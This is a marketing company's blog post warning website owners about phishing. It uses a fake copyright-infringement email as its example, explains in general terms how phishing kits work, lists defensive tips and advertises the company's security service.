Phishing Isn’t Phunny

One of our clients recently received an email from “Melynda”.  She stated she was a photographer and claimed copyright infringement regarding photos used on his website.  Obviously, this caused great alarm and required immediate attention.  Or did it?   This is a scam of the “phishing” variety and has been documented in multiple sources online.

In case you receive a comparable email, the “sender” is generally Melinda, Mel or Melynda.  As noted, she claims you have stolen her intellectual property (photos) and demands you remove them immediately.  She goes further offering to “prove” her ownership and provides a link.  Don’t fall for this line of garbage.  Though initially convincing, conduct your own research before proceeding any farther.

What is Phishing?

The Oxford Dictionary defines phishing as “the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers”.

Dating back to the 1990s, phishing is one of the oldest, and most common, form of cyberattack.  In fact, phishing is so pervasive that over 78% of all data breaches are a result of a phishing attack.   Notable data breaches in the last 5 years include:

  • Hackers (Phishermen) convinced Hillary Clinton’s campaign chairman John Podesta to give up his Gmail password, opening his mail up for their perusal.
  • Apple iCloud servers were breached on multiple fronts and intimate photos of several celebrities were made public.
  • University of Kansas employees were convinced to share their paycheck direct deposit information, costing them their paychecks.

As you can see, this form of cyberattack works on intelligent, well educated individuals just as well as the gullible, naïve or elderly.

The information phishing attacks looks for are generally either (a) financial information, such as credit card numbers; (b) personal information, like passwords or (c) the user to click on a link/download and allow ransomware installation on a system.

Why is Phishing Effective?

Cyber criminals can purchase phishing “kits” on the dark web.  These kits are what make the scam look so realistic and fool even the discerning.  A kit provides the framework and information necessary to set up a fake website, fake URL, and fake email; all of which are designed for one single purpose – to convince you of the sender’s legitimacy and entice you into providing the information they want.

The kit works like this:

  1. The legitimate website is cloned (think Amazon or your local bank).
  2. The login page is changed to point toward a script focused on stealing your credentials.
  3. These modifications are then bundled together in a Zip file and sold as a kit on the dark web.
  4. Once purchased, the kid is uploaded to the hacked website and the files are unzipped.
  5. Emails are then sent with links that point to the fake website. On login, you receive the script that asks you for your personal information.  As everything looks normal, you innocently provide what they are looking for.

A company called Ironscales monitored 50,000 fake log-in pages.  The most common companies for phishers to clone were:

  • PayPal – 22%
  • Microsoft – 19%
  • Facebook – 15%
  • eBay – 6%
  • Amazon – 3%

How to Reduce Your Risk of Getting Caught

There are some steps you can take to reduce the risk of being a phishing scam victim.

  1. Always double-check the spellings in URLs before you click on a link or share sensitive data. Frequently, these have a minor, and easily overlooked change (such as changing an i for an l).
  2. Watch for URL redirects, where you are sent to a fraudulent website, with a duplicated design. Though we don’t habitually look at the URL, checking it to ensure it does belong with the company in question is an excellent way to detect a phishing scam.
  3. If you receive a suspicious email, don’t hit respond. This prevents the hacker from potentially gaining access to your system.
  4. Don’t share personal data such as birthdays, vacation plans, your phone number or address on social media. These all give cybercriminals clues about you and can make their phishing expeditions much more believable.
  5. Have your IT department “sandbox” all inbound email. This step checks the validity of all links BEFORE the email hits your computer.
  6. Pay attention. We all go through our day responding to unrelenting email.  It’s a part of our life and our livelihood.
  7. Get Top Roof Marketing’s Ongoing Security/Protection Program. This won’t stop a phishing attempt; but should that attempt result in damage to your existing site, it will get your site repaired at no cost to you.  Additionally, the increased security and routinely updated WordPress platforms may reduce to potential for a cyberattack in the future.

For more information, please call the Top Roof Marketing team today at (800) 795-2187 and make yourself and your website “out of season” for the phishing cybercriminal community.